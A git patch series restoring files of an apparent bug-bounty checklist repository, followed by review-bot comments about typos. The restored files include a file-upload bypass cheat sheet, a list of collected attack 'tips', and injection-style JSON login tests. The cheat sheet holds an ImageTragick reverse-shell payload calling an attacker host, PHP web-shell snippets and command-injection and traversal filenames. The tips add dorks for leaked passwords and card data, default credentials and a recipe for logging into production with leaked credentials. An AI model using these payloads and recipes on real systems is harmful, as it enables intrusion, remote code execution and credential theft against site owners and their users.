- -> you can check it by: -https://target[.]com/.svn/wc.db - -> then you can use this tool to dump all of the website source code - -https://github.com/anantshri/svn-extractor -``` - -[ ] Tip 13 -``` -1. Shodan Dork -> Some Assets. -2. Fuzzing & got 403 Forbidden on /config dir. -3. Fuzzing on /config/FUZZ and getting some config files. -4. Same pattern and it works on another asset. -``` - -[ ] Tip 14 -``` - -Default Credentials admin:admin -- shodan dork : -- ssl:"target[.]com" 200 http.title:"dashboard" - -``` -[ ] Tip 15 - - -A quick thread about JIRA misconfiguration that I tried today. -``` -3. Google dorks to find jira dashboards. - -inurl:/ConfigurePortalPages!default.jspa?view=popular -``` -``` -4. Google dork to find jira filters page. - -inurl:/ManageFilters.jspa?filterView=popular AND ( intext:All users OR intext:Shared with the public OR intext:Public ) -``` - -[ ] Tip 16 -``` -5. Google dork to find the exposed user list. - -inurl:/UserPickerBrowser.jspa -intitle:Login -intitle:Log -``` - -[ ] Tip 17 -``` -GitHub Recon Tip: look for CSV files that have a high chance of containing confidential information -dork: "org:company extension:csv admin" -leak: "cc number, cvv, email, phone number" -``` - -[ ] Tip 18 -Oneliner for possible Reflected XSS using Nilo, gxss and Dalfox: -``` -cat targets | waybackurls | anew | grep "=" | gf xss | nilo | gxss -p test | dalfox pipe --skip-bav --only-poc r --silence --skip-mining-dom --ignore-return 302,404,403 -``` - -[ ] Tip 19 -``` -Tip : "GET request for XML not found" changes the request to POST with XXE payload -``` - -[ ] Tip 20 -Extract Juicy Info From AlienVault -``` -for sub in $(cat HOSTS.txt); do gron "https://otx.alienvault.com/otxapi/indicator/hostname/url_list/$sub?limit=100&page=1" | grep "\burl\b" | gron --ungron | jq | egrep -wi 'url' | awk '{print $2}' | sed 's/"//g'| sort -u | tee -a OUT.txt ;done -``` - -[ ] Tip 21 -bypass PHPMYADMIN -``` -phpmyadmin =>301 -PHPmyadmin =>200 -PHPMYadmin =>200 
-PHPMYADMIN =>200 -phpMYadmin =>200 -phpmyAdmin =>200 -``` - - -[ ] Tip 22 -SVN -``` -1. ./dirsearch.py -u target -e php,html,js,xml -x 500,403 -2. found http://url.com/.svn/ -3. clone & use https://github.com/anantshri/svn-extractor -4. ./svn-extractor.py --url http://url.com --match database.php -5. result in output dir and just open it -``` - -[ ] Tip 23 -xss -``` -in : -firstname: - -========================== -1:- Use https://github.com/Leoid/MatchandReplace -2:- Import to burpsuite match and replace. -3:- Run gospider. gospider -s url -a -w --sitemap -r -c 100 -d 8 -p http://127.0.0.1:8080 -4:- The Blind xss payload will added automatically by burp and gospider. -Finally:- 4 BLIND XSS REPORTS. - -``` -[ ] Tip 24 -Cookie Bomb -``` -URL that causes the cookie length to exceed request header limits for all requests until the cookie expires. -1. Find a Cookie set by a parameter -2. Inject as many commas as you can into the parameter until you DoS that user -``` - -[ ] Tip 25 -xss via jwt -``` -1. Make a jwt token and insert a xss paylaod. -2. The final url is like url/dest?jwt=vulnerable-jwt-token. -(jwt= paramter was decoding the provided jwt token and show's it into the page). -``` - -[ ] Tip 26 -Getting Private Information URLs by curling -``` -1. Grab all URLs from your target which you think hard to hunt or test or static -2. Save all files in any.txt -3. Command : for i in $(cat any.txt); do curl "$i" >> output.txt; done -4. All curled response grep for following -Keywords: -drive. google -docs. 
google -/spreadsheets/d/ -/document/d/ -NOTE: This creates lots of junk so make sure you perform in folder , so you can delete later -You will get URLs includes juicy information -``` - -[ ] Tip 26 -Injecting Payload In Phone Numbers field -``` -https://twitter.com/Pwn2arn/status/1609146484263641089 -``` - -[ ] Tip 27 -Easy P1 upside_down_face -``` -1: Collect all the Js files by using the developer tool on mozila -2: Run Link Finder Tool on that JS files which you got from dev tool or use Js Miner tool -3: Now check manually sensitive keyword js file -``` - -[ ] Tip 28 -Tips for my last P1 : -``` -1 - Found dev portal for developing require Basic Auth -2 - search in GitHub "domain" docker -3- found a user try to pull the privite repository and passing the username:pass -4 - Decode Base64 Basic Auth -5 - Logged in and full access on all Prod - -``` - -[ ] Tip 29 -Github leak for Aws,jira,okta etc -``` -1. Org:"target" pwd/pass/passwd/password -2. "target. atlassian" pwd/pass/passwd/password -3. "target. okta" pwd/pass/passwd/password -4. "Jira. target" pwd/pass/passwd/password -``` - -[ ] Tip 30 -soucremap js -``` -https://blog.prodefense.io/little-bug-big-impact-25k-bounty-9e47773f959f -https://github.com/rarecoil/unwebpack-sourcemap - -``` - -[ ] Tip 31 -if a site uses AngularJS, -``` -test {{7*7}} to see whether 49 is rendered anywhere. -If the application is built with ASP.NET with XSS protection -enabled, you might want to focus on testing other vulnerability -types first and check for XSS as a last resort. - -AngularJS Client-Side Template Injection -https://github.com/tijme/angularjs-csti-scanner?fbclid=IwAR0z3X2XRXRugdCiGSMk_CHVn3-MZU1qFHWKVHXUEZ5oVPWOiYu4WwGqWhE - -``` - -[ ] Tip 32 -If a site is built with Rails, -``` -you might know that URLs typically follow a /CONTENT_TYPE/RECORD_ID pattern, where the -RECORD_ID is an autoincremented integer. Using HackerOne as an example, report URLs follow the pattern -www.hackerone.com/reports/12345. 
Rails applications commonly use integer IDs, so you might prioritize testing -insecure direct object reference vulnerabilities because this vulnerability type is easy for developers to overlook. - -``` - From 44b4e9b448d763f0c0ee4b9f3f77466b0198d2e5 Mon Sep 17 00:00:00 2001 From: Maksim Partsiankou Date: Tue, 10 Dec 2024 19:24:28 +0100 Subject: [PATCH 2/3] return deleted files --- File Upload/File Upload.md | 239 ++++++++++++++++++++++ tips from twitter/tips_twitter.md | 324 ++++++++++++++++++++++++++++++ 2 files changed, 563 insertions(+) create mode 100644 File Upload/File Upload.md create mode 100644 tips from twitter/tips_twitter.md diff --git a/File Upload/File Upload.md b/File Upload/File Upload.md new file mode 100644 index 0000000..6582f18 --- /dev/null +++ b/File Upload/File Upload.md 
@@ -0,0 +1,239 @@ +## Where to find +In upload file feature, for example upload photo profile feature + +## How to exploit +read also this pdf it contain a many of ideas +1-https://github.com/Az0x7/vulnerability-Checklist/blob/main/File%20Upload/File-Upload.pdf by`0xAwali` +2-https://github.com/Az0x7/vulnerability-Checklist/blob/main/File%20Upload/Slides(1).pdf by`ebrahim hegazy` + +1. Change the `Content-Type` value +``` +POST /images/upload/ HTTP/1.1 +Host: target.com +... + +---------------------------829348923824 +Content-Disposition: form-data; name="uploaded"; filename="dapos.php" +Content-Type: application/x-php +``` +Change the Content-Type +``` +POST /images/upload/ HTTP/1.1 +Host: target.com +... + +---------------------------829348923824 +Content-Disposition: form-data; name="uploaded"; filename="dapos.php" +Content-Type: image/jpeg +``` + +2. Try to change the extension when send the request, for example in here you cant upload file with ext php but you can upload jpg file +``` +POST /images/upload/ HTTP/1.1 +Host: target.com +... + +---------------------------829348923824 +Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpg" +Content-Type: application/x-php +``` +Change the request to this +``` +POST /images/upload/ HTTP/1.1 +Host: target.com +... + +---------------------------829348923824 +Content-Disposition: form-data; name="uploaded"; filename="dapos.php" +Content-Type: application/x-php +``` + +3. Upload the payload, but start with GIF89a; and +``` +POST /images/upload/ HTTP/1.1 +Host: target.com +... + +---------------------------829348923824 +Content-Disposition: form-data; name="uploaded"; filename="dapos.php" +Content-Type: image/gif + +GIF89a; +``` +And don't forget to change the content-type to image/gif + +4. Bypass content length validation, it can be bypassed using small payload +``` +() +``` + +5. Using null byte in filename +``` +file.php%00.gif +``` + +6. 
Using double extensions for the uploaded file +``` +file.jpg.php +``` + +7. Uploading an unpopular php extensions (php4,php5,php6,phtml) +``` +file.php5 +``` + +8. Try to randomly capitalizes the file extension +``` +file.pHP5 +``` + +9. Mix the tips! + + +- Upload Function + - Extensions Impact + - `ASP`, `ASPX`, `PHP5`, `PHP`, `PHP3`: Webshell, RCE + - `SVG`: Stored XSS, SSRF, XXE + - `GIF`: Stored XSS, SSRF + - `CSV`: CSV injection + - `XML`: XXE + - `AVI`: LFI, SSRF + - `HTML`, `JS` : HTML injection, XSS, Open redirect + - `PNG`, `JPEG`: Pixel flood attack (DoS) + - `ZIP`: RCE via LFI, DoS + - `PDF`, `PPTX`: SSRF, BLIND XXE + - Blacklisting Bypass + - PHP → `.phtm`, `phtml`, `.phps`, `.pht`, `.php2`, `.php3`, `.php4`, `.php5`, `.shtml`, `.phar`, `.pgif`, `.inc` + - ASP → `asp`, `.aspx`, `.cer`, `.asa` + - Jsp → `.jsp`, `.jspx`, `.jsw`, `.jsv`, `.jspf` + - Coldfusion → `.cfm`, `.cfml`, `.cfc`, `.dbm` + - Using random capitalization → `.pHp`, `.pHP5`, `.PhAr` + - Whitelisting Bypass + - `file.jpg.php` + - `file.php.jpg` + - `file.php.blah123jpg` + - `file.php%00.jpg` + - `file.php\x00.jpg` this can be done while uploading the file too, name it `file.phpD.jpg` and change the D (44) in hex to 00. + - `file.php%00` + - `file.php%20` + - `file.php%0d%0a.jpg` + - `file.php.....` + - `file.php/` + - `file.php.\` + - `file.php#.png` + - `file.` + - `.html` + - Vulnerabilities + - [ ] Directory Traversal + - Set filename `../../etc/passwd/logo.png` + - Set filename `../../../logo.png` as it might changed the website logo. + - [ ] SQL Injection + - Set filename `'sleep(10).jpg`. + - Set filename `sleep(10)-- -.jpg`. + - [ ] Command Injection + - Set filename `; sleep 10;` + - [ ] SSRF + - Abusing the "Upload from URL", if this image is going to be saved in some public site, you could also indicate a URL from [IPlogger](https://iplogger.org/invisible/) and steal information of every visitor. + - SSRF Through `.svg` file. 
+ + ```php + + ``` + + - [ ] ImageTragic + + ``` + push graphic-context + viewbox 0 0 640 480 + fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)' + pop graphic-context + ``` + + - [ ] XXE + - Upload using `.svg` file + + ```xml + + ]> + + &xxe; + + ``` + + ```xml + + + + ``` + + - Using excel file + - [ ] XSS + - Set file name `filename="svg onload=alert(document.domain)>"` , `filename="58832_300x300.jpg"` + - Upload using `.gif` file + + ``` + GIF89a/**/=alert(document.domain)//; + ``` + + - Upload using `.svg` file + + ```xml + + ``` + + ```xml + + + + + + + + ``` + + - [ ] Open Redirect + 1. Upload using `.svg` file + + ```xml + + + + + + + ``` + + - Content-ish Bypass + - [ ] Content-type validation + - Upload `file.php` and change the `Content-type: application/x-php` or `Content-Type : application/octet-stream` + to `Content-type: image/png` or `Content-type: image/gif` or `Content-type: image/jpg`. + - [ ] Content-Length validation + - Small PHP Shell + + ```php + () + ``` + + - [ ] Content Bypass Shell + - If they check the Content. Add the text "GIF89a;" before you shell-code. ( `Content-type: image/gif` ) + + ```php + GIF89a; + ``` + + - Misc + - [ ] Uploading `file.js` & `file.config` (web.config) + - [ ] Pixel flood attack using image + - [ ] DoS with a large values name: `1234...99.png` + - [ ] Zip Slip + - If a site accepts `.zip` file, upload `.php` and compress it into `.zip` and upload it. Now visit, `site.com/path?page=zip://path/file.zip%23rce.php` + - [ ] Image Shell + - Exiftool is a great tool to view and manipulate exif-data. Then I will to rename the file `mv pic.jpg pic.php.jpg` + + ```php + exiftool -Comment='"; system($_GET['cmd']); ?>' pic.jpg + ``` diff --git a/tips from twitter/tips_twitter.md b/tips from twitter/tips_twitter.md new file mode 100644 index 0000000..c5cce6f --- /dev/null +++ b/tips from twitter/tips_twitter.md 
@@ -0,0 +1,324 @@ +[ ] Tip 1 +``` +Here’s my last finding (P1) +1- register account +2- intercept request +3- here’s the response in image so in “role” parameter we have ROLE_USER +So i don’t know what i can replace it to privilege my account to admin +4- open source code and look in js files +5-So in js files i user ctrl+F to search about “user_role” i found another value that’s called “admin_role” +6- so i use match and replace to replace value’s +7- boom privilege my account to admin account with full control +``` +[ ] Tip 2 +``` +اسعد الله ايامكم بكل خير + +هذا ثغرة في شركة مايكروسوفت +كانت جدا بسيطة بسبب خطأ في اعداد سيرفر IIS + +Exploit: +https//anywebsite.com/c:/Windows/Win.ini +``` + +[ ] Tip 3 +``` +CloudFront bypass:⚔️ + +">%0D%0A%0D%0A + +Would be interested to know if this is target specific or other CloudFront websites are vulnerable +``` + +[ ] Tip 4 + +``` +1 : Get all the URL from wayback / Gau +2 : Filter out the js file using httpx +3 : Check Manually all the js file or you can use nuclei template or used @trufflesec chrome extension +``` +[ ] Tip 5 +``` +target.com/wp-config.php => 404 not found +target.com/wp-config.php.… ==> 200 ok and downloaded +wp-config.php.swp ==>>200 ok + +after that if its contain encoded using hexadecimal decode it . 
+``` + +[ ] Tip 6 +``` +try testing for SQLi Authentication Bypass :⚔️ +username:'--'/"--" +password:'--'/"--" +``` +[ ] Tip 7 +``` +default credentials: +PSADMIN:PSADMIN +PS:PS +PSEM:PSEM +Google Dork: intitle:"Oracle+PeopleSoft+Sign-in" +Wrote a nuclei template to test all permutations +``` +[ ] Tip 8 +``` +nmap -sV -iL host.txt -oN nmap_scan.txt +Wait a few hours +cat nmap_scan.txt | grep open +``` + +[ ] Tip 9 +```Bybass cloudfaire with cynses search +https://youtu.be/VsM6ERUx_AA +------------------------------------------ +------------------------------------------ +Xss payload +https://github.com/Aacle/xss_payload +------------------------------------------ +------------------------------------------ +Use Nuclei for leaked api. +$ nuclei -t /nuclei-templates/token-spray/ -var token={yourToken} +------------------------------------------ +------------------------------------------ +#Scan through #TOR +sqlmap -u “http://target_server/” --tor --tor-type=SOCKS5 +------------------------------------------ +------------------------------------------ +Tip: - always check company's/Organization employees GitHub account for leaked ghp_ token, +and check access to each repo of main organization + +------------------------------------------ +------------------------------------------ + +bypass alert ==> [alert][0].call(this,1) +------------------------------------------ +------------------------------------------ +``` + +[ ] Tip 10 +``` +1_ Go to SHODAN and get the IP +2 _ Go to Dirsearch and do a Fuzzing +3_ Obtaining sensitive data +``` +[ ] Tip 11 +``` +Recon Recon Recon!! +Shodan Dorking Always wins. + +ssl:"Company Inc" +Filter results by http title. +Start fuzzing an interesting asset. +Found swagger-ui/ +Tried swagger ui xss with +https://github.com/seanmarpo/webjars-swagger-xss +``` +[ ] Tip 12 +``` +Have you ever heard about wc-db file disclosure?! 
+ +> you can check it by: +https://target[.]com/.svn/wc.db + +> then you can use this tool to dump all of the website source code + +https://github.com/anantshri/svn-extractor +``` + +[ ] Tip 13 +``` +1. Shodan Dork -> Some Assets. +2. Fuzzing & got 403 Forbidden on /config dir. +3. Fuzzing on /config/FUZZ and getting some config files. +4. Same pattern and it works on another asset. +``` + +[ ] Tip 14 +``` + +Default Credentials admin:admin +- shodan dork : +- ssl:"target[.]com" 200 http.title:"dashboard" + +``` +[ ] Tip 15 + + +A quick thread about JIRA misconfiguration that I tried today. +``` +3. Google dorks to find jira dashboards. + +inurl:/ConfigurePortalPages!default.jspa?view=popular +``` +``` +4. Google dork to find jira filters page. + +inurl:/ManageFilters.jspa?filterView=popular AND ( intext:All users OR intext:Shared with the public OR intext:Public ) +``` + +[ ] Tip 16 +``` +5. Google dork to find the exposed user list. + +inurl:/UserPickerBrowser.jspa -intitle:Login -intitle:Log +``` + +[ ] Tip 17 +``` +GitHub Recon Tip: look for CSV files that have a high chance of containing confidential information +dork: "org:company extension:csv admin" +leak: "cc number, cvv, email, phone number" +``` + +[ ] Tip 18 +Oneliner for possible Reflected XSS using Nilo, gxss and Dalfox: +``` +cat targets | waybackurls | anew | grep "=" | gf xss | nilo | gxss -p test | dalfox pipe --skip-bav --only-poc r --silence --skip-mining-dom --ignore-return 302,404,403 +``` + +[ ] Tip 19 +``` +Tip : "GET request for XML not found" changes the request to POST with XXE payload +``` + +[ ] Tip 20 +Extract Juicy Info From AlienVault +``` +for sub in $(cat HOSTS.txt); do gron "https://otx.alienvault.com/otxapi/indicator/hostname/url_list/$sub?limit=100&page=1" | grep "\burl\b" | gron --ungron | jq | egrep -wi 'url' | awk '{print $2}' | sed 's/"//g'| sort -u | tee -a OUT.txt ;done +``` + +[ ] Tip 21 +bypass PHPMYADMIN +``` +phpmyadmin =>301 +PHPmyadmin =>200 +PHPMYadmin =>200 
+PHPMYADMIN =>200 +phpMYadmin =>200 +phpmyAdmin =>200 +``` + + +[ ] Tip 22 +SVN +``` +1. ./dirsearch.py -u target -e php,html,js,xml -x 500,403 +2. found http://url.com/.svn/ +3. clone & use https://github.com/anantshri/svn-extractor +4. ./svn-extractor.py --url http://url.com --match database.php +5. result in output dir and just open it +``` + +[ ] Tip 23 +xss +``` +in : +firstname: + +========================== +1:- Use https://github.com/Leoid/MatchandReplace +2:- Import to burpsuite match and replace. +3:- Run gospider. gospider -s url -a -w --sitemap -r -c 100 -d 8 -p http://127.0.0.1:8080 +4:- The Blind xss payload will added automatically by burp and gospider. +Finally:- 4 BLIND XSS REPORTS. + +``` +[ ] Tip 24 +Cookie Bomb +``` +URL that causes the cookie length to exceed request header limits for all requests until the cookie expires. +1. Find a Cookie set by a parameter +2. Inject as many commas as you can into the parameter until you DoS that user +``` + +[ ] Tip 25 +xss via jwt +``` +1. Make a jwt token and insert a xss payload. +2. The final url is like url/dest?jwt=vulnerable-jwt-token. +(jwt= parameter was decoding the provided jwt token and show's it into the page). +``` + +[ ] Tip 26 +Getting Private Information URLs by curling +``` +1. Grab all URLs from your target which you think hard to hunt or test or static +2. Save all files in any.txt +3. Command : for i in $(cat any.txt); do curl "$i" >> output.txt; done +4. All curled response grep for following +Keywords: +drive. google +docs. 
google +/spreadsheets/d/ +/document/d/ +NOTE: This creates lots of junk so make sure you perform in folder , so you can delete later +You will get URLs includes juicy information +``` + +[ ] Tip 26 +Injecting Payload In Phone Numbers field +``` +https://twitter.com/Pwn2arn/status/1609146484263641089 +``` + +[ ] Tip 27 +Easy P1 upside_down_face +``` +1: Collect all the Js files by using the developer tool on mozilla +2: Run Link Finder Tool on that JS files which you got from dev tool or use Js Miner tool +3: Now check manually sensitive keyword js file +``` + +[ ] Tip 28 +Tips for my last P1 : +``` +1 - Found dev portal for developing require Basic Auth +2 - search in GitHub "domain" docker +3- found a user try to pull the private repository and passing the username:pass +4 - Decode Base64 Basic Auth +5 - Logged in and full access on all Prod + +``` + +[ ] Tip 29 +Github leak for Aws,jira,okta etc +``` +1. Org:"target" pwd/pass/passwd/password +2. "target. atlassian" pwd/pass/passwd/password +3. "target. okta" pwd/pass/passwd/password +4. "Jira. target" pwd/pass/passwd/password +``` + +[ ] Tip 30 +sourcemap js +``` +https://blog.prodefense.io/little-bug-big-impact-25k-bounty-9e47773f959f +https://github.com/rarecoil/unwebpack-sourcemap + +``` + +[ ] Tip 31 +if a site uses AngularJS, +``` +test {{7*7}} to see whether 49 is rendered anywhere. +If the application is built with ASP.NET with XSS protection +enabled, you might want to focus on testing other vulnerability +types first and check for XSS as a last resort. + +AngularJS Client-Side Template Injection +https://github.com/tijme/angularjs-csti-scanner?fbclid=IwAR0z3X2XRXRugdCiGSMk_CHVn3-MZU1qFHWKVHXUEZ5oVPWOiYu4WwGqWhE + +``` + +[ ] Tip 32 +If a site is built with Rails, +``` +you might know that URLs typically follow a /CONTENT_TYPE/RECORD_ID pattern, where the +RECORD_ID is an autoincremented integer. Using HackerOne as an example, report URLs follow the pattern +www.hackerone.com/reports/12345. 
Rails applications commonly use integer IDs, so you might prioritize testing +insecure direct object reference vulnerabilities because this vulnerability type is easy for developers to overlook. + +``` From 385a87c82f3fac712249b0942f9c7a3571540b97 Mon Sep 17 00:00:00 2001 From: Maksim Partsiankou Date: Tue, 10 Dec 2024 19:29:53 +0100 Subject: [PATCH 3/3] return api auth file --- Api Authentication/Authentication.md | 771 +++++++++++++++++++++++++++ 1 file changed, 771 insertions(+) create mode 100644 Api Authentication/Authentication.md diff --git a/Api Authentication/Authentication.md b/Api Authentication/Authentication.md new file mode 100644 index 0000000..fff721b --- /dev/null +++ b/Api Authentication/Authentication.md @@ -0,0 +1,771 @@ +97 JSON Tests for for Authentication Endpoints link pdf [link](https://www.linkedin.com/feed/update/urn:li:activity:7097279293608607746/) + +1. Basic credentials +``` +{ +"login": "admin", +"password": "admin" +} +``` + +2. Empty credentials: +``` +{ +"login": "", +"password": "" +} +``` + +3- Null values: +``` +{ +"login": null, +"password": null +} +``` + +4. Credentials as numbers: +``` +{ +"login": 123, +"password": 456 +} +``` + +6. Credentials as booleans: +``` +{ +"login": true, +"password": false +} +``` + +7. Credentials as arrays: +``` +{ +"login": ["admin"], +"password": ["password"] +} +``` + +8. Credentials as objects: +``` +{ +"login": {"username": "admin", +"password": {"password": "password"}} +} +``` + +9. Special characters in credentials: +``` +{ +"login": "@dm!n", +"password": "p@ssw0rd#" +} +``` + +10. SQL Injection: +``` +{ +"login": "admin' --", +"password": "password" +} +``` + +11. HTML tags in credentials: +``` +{ +"login": "

admin

", +"password": "ololo-HTML-XSS" +} +``` + +12. Unicode in credentials: +``` +{ +"login": "\u0061\u0064\u006D\u0069\u006E", +"password":"\u0070\u0061\u0073\u0073\u0077\u006F\u0072\u0064" +} +``` + +13. Credentials with escape characters: +``` +{ +"login": "ad\\nmin", +"password": "pa\\ssword" +} +``` + +14. Credentials with white space: +``` +{ +"login": " ", +"password": " " +} +``` + +15. Overlong values: +``` +{ +"login": "a"*10000, +"password": "b"*10000 +} + +``` +16. Malformed JSON (missing brace): +``` +{ +"login": "admin", +"password": "admin" +} +``` + +17. Malformed JSON (extra comma): +``` +{ +"login": "admin", +"password": "admin", +} +``` + +18. Missing login key: +``` +{ +"password": "admin" +} +``` + +19. Missing password key: +``` +{ +"login": "admin" +} +``` + +20. Swapped key values: +``` +{ +"admin": "login", +"password": "password" +} +``` + +21. Extra keys: +``` +{ +"login": "admin", +"password": "admin", +"extra": "extra" +} +``` + +22. Missing colon: +``` +{ +"login" "admin", +"password": "password" +} +``` + +23. Invalid Boolean as credentials: +``` +{ +"login": yes, +"password": no +} +``` + +25. All keys, no values: +``` +{ +"": "", +"": "" +} +``` + +26. Nested objects: +``` +{ +"login": {"innerLogin": "admin", +"password": {"innerPassword": "password"}} +} +``` +27. Case sensitivity testing: +``` +{ +"LOGIN": "admin", +"PASSWORD": "password" +} +``` + +28. Login as a number, password as a string: +``` +{ +"login": 1234, +"password": "password" +} +``` + +29. Login as a string, password as a number: +``` +{ +"login": "admin", +"password": 1234 +} +``` + +30. Repeated keys: +``` +{ +"login": "admin", +"login": "user", +"password": "password" +} +``` +31. Single quotes instead of double: +``` +{ +'login': 'admin', +'password': 'password' +} +``` +33. Login and password with only special characters: +``` +{ +"login": "@#$%^&*", +"password": "!@#$%^&*" +} +``` +34. 
Unicode escape sequence: +``` +{ +"login": "\u0041\u0044\u004D\u0049\u004E", +"password":"\u0050\u0041\u0053\u0053\u0057\u004F\u0052\u0044" +} +``` + +35. Value as object instead of string: +``` +{ +"login": {"$oid": +"507c7f79bcf86cd7994f6c0e"}, +"password": "password"} +} +``` + +37. Nonexistent variables as values: +``` +{ +"login": undefined, +"password": undefined +} +``` + +38. Extra nested objects: +``` +{ +"login": "admin", +"password": "password", +"extra": {"key1": "value1", +"key2": "value2"} +} + +``` + +39. Hexadecimal values: +``` +{ +"login": "0x1234", +"password": "0x5678" +} +``` + +40. Extra symbols after valid JSON: +``` +{ +"login": "admin", +"password": "password"}@@@@@@ +} +``` + +41. Only keys, without values: +``` +{ +"login":, +"password": +} +``` + +42. Insertion of control characters: +``` +{ +"login": "ad\u0000min", +"password": "pass\u0000word" +} +``` + +43. Long Unicode Strings: +``` +{ +"login": "\u0061"*10000, +"password": "\u0061"*10000 +} +``` + +44. Newline Characters in Strings: +``` +{ +"login": "ad\nmin", +"password": "pa\nssword" +} +``` + +45. Tab Characters in Strings: +``` +{ +"login": "ad\tmin", +"password": "pa\tssword" +} +``` + +46. Test with HTML content in Strings: +``` +{ +"login": "admin", +"password": "password" +} +``` + +47. JSON Injection in Strings: +``` +{ +"login": "{\"injection\":\"value\"}", +"password": "password" +} +``` + +48. Test with XML content in Strings: +``` +{ +"login": "admin", +"password": "password" +} +``` + +49. Combination of Number, Strings, and Special characters: +``` +{ +"login": "ad123min!@", +"password": "pa55w0rd!@" +} +``` + +50. Use of environment variables: +``` +{ +"login": "${USER}", +"password": "${PASS}" +} +``` + +51. Backslashes in Strings: +``` +{ +"login": "ad\\min", +"password": "pa\\ssword" +} +``` + +52. Long strings of special characters: +``` +{ +"login": "!@#$%^&*()"*1000, +"password": "!@#$%^&*()"*1000 +} +``` + +53. 
Empty Key in JSON: +``` +{ +"": "admin", +"password": "password" +} +``` + +55. JSON Injection in Key: +``` +{ +"{\"injection\":\"value\"} +": "admin", +"password": "password" +} +``` + +56. Quotation marks in strings: +``` +{ +"login": "\"admin\"", +"password": "\"password\"" +} +``` + +57. Credentials as nested arrays: +``` +{ +"login": [["admin"]], +"password": [["password"]] +} +``` + +58. Credentials as nested objects: +``` +{ +"login": {"username": {"value": "admin", +"password": {"password": {"value": +"password" +} +``` + +59. Keys as numbers: +``` +{ +123: "admin", +456: "password" +} +``` + +60. Testing with greater than and less than signs: +``` +{ +"login": "admin>1", +"password": "alert('hi')", +"password": "password" +} +``` + +85. Negative numbers as strings: +``` +{ +"login": "-123", +"password": "-456" +} +``` + +86. Values as URLs: +``` +{ +"login": "https://admin.com", +"password": "https://password.com" +} +``` + +87. Strings with email format: +``` +{ +"login": "admin@admin.com", +"password": "password@password.com" +} +``` +88. Strings with IP address format: +``` +{ +"login": "192.0.2.0", +"password": "203.0.113.0" +} +``` + +89. Strings with date format: +``` +{ +"login": "2023-08-03", +"password": "2023-08-04" +} +``` + +90. JSON with exponential values: +``` +{ +"login": 1e+30, +"password": 1e+30 +} +``` + +91. JSON with negative exponential values: +``` +{ +"login": -1e+30, +"password": -1e+30 +} +``` + +92. Using Zero Width Space (U+200B) in strings: +``` +{ +"login": "admin​", +"password": "password​" +} +``` + +93. Using Zero Width Joiner (U+200D) in strings: +``` +{ +"login": "adminâ€", +"password": "passwordâ€" +} +``` + +94. JSON with extremely large numbers: +``` +{ +"login": 12345678901234567890, +"password": 12345678901234567890 +} +``` + +95. Strings with backspace characters: +``` +{ +"login": "admin\b", +"password": "password\b" +} +``` + +96. 
Test with emoji in strings: +``` +{ +"login": "admin😀", +"password": "password😀" +} +``` + +97. JSON with comments, although they are not officially supported in JSON: +``` +{ +/*"login": "admin", +"password": "password"*/ +} +``` + +98. JSON with base64 encoded values: +``` +{ +"login": "YWRtaW4=", +"password": "cGFzc3dvcmQ=" +} +``` + +99. Including null byte character (may cause truncation): +``` +{ +"login": "admin\0", +"password": "password\0" +} +``` + +100. JSON with credentials in scientific notation: +``` +{ +"login": 1e100, +"password": 1e100 +} +``` + +102. Strings with octal values: +``` +{ +"login": "\141\144\155\151\156", +"password":"\160\141\163\163\167\157\162\144" +} +``` +103. writeup +``` +{ +root:{ +"username": "admin", +"password":"admin" +} +} +``` + +104. writeup +``` +basic => username=admin +username[]=admin +username[0]=admin +username=admin&username=admin +delete username=admin + +``` \ No newline at end of file
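Review bot: the `@@ -1,325 +0,0 @@` hunk in PATCH 1/3 deletes `tips from twitter /tips_twitter.md` outright (the stat shows three whole files removed, 1383 deletions) under a commit titled "fix typos in text", which does not describe the change. The old path carries a trailing space in the directory name and PATCH 2/3 re-creates the file under `tips from twitter/`, so this is a directory rename; do it with `git mv` in the same commit as the spelling fixes so git records a rename and the review diff shrinks to the handful of corrected words. As split, a tree checked out at PATCH 1/3 alone is missing three files, which breaks bisect.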
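Review bot: the `@@ -0,0 +1,239 @@` hunk for `File Upload/File Upload.md` in PATCH 2/3 re-adds the file at exactly the path PATCH 1/3 deleted it from, so across the series this file's delete-plus-add is a no-op and both hunks should be dropped (a squash of the three patches yields an empty diff here). If the file is going to be touched anyway, the series' stated purpose suggests fixing the typos that survive in it: "it contain a many of ideas", "when send the request", "you cant upload", "Try to randomly capitalizes the file extension", "as it might changed the website logo", "Then I will to rename the file", and the stray space in `Content-Type : application/octet-stream`.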
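Review bot: the `@@ -0,0 +1,324 @@` hunk for `tips from twitter/tips_twitter.md` in PATCH 2/3 is not a verbatim restore of what PATCH 1/3 removed (324 lines versus 325, plus Mnauly→Manually, paylaod→payload, paramter→parameter, privite→private, mozila→mozilla, soucremap→sourcemap), so the actual spelling fixes are buried inside a whole-file addition; express them as a `git mv` followed by a small edit so each change is visible. Within the hunk: in Tip 9 the opening fence is written as ```` ```Bybass cloudfaire with cynses search ````, which makes that sentence the fence's info string rather than content, so move it onto the line after the fence and correct it to "Bypass Cloudflare with Censys search"; the heading "Tip 26" is used for two consecutive tips; and Tip 2's `https//anywebsite.com/...` is missing the colon.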
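Review bot: the `@@ -0,0 +1,771 @@` hunk for `Api Authentication/Authentication.md` in PATCH 3/3 creates the file as new rather than renaming it from `Api Authentication /Authentication.md` (old path with trailing space), so git cannot pair it with the deletion in PATCH 1/3; use `git mv` in a single commit. Content points, since the whole file is in the diff: the title line reads "97 JSON Tests for for Authentication Endpoints" (doubled word), and the numbering actually runs to 104 with gaps (no 5, 24, 32, 36, 54, 101) and "3-" where every other item uses "N."; item 16 is captioned "Malformed JSON (missing brace)" but the JSON shown is well-formed, so either the caption or the example is wrong; item 93 shows the bytes `â€` where a U+200D Zero Width Joiner is intended, so write it as the `\u200d` escape so the intent survives re-encoding; and the file ends without a trailing newline.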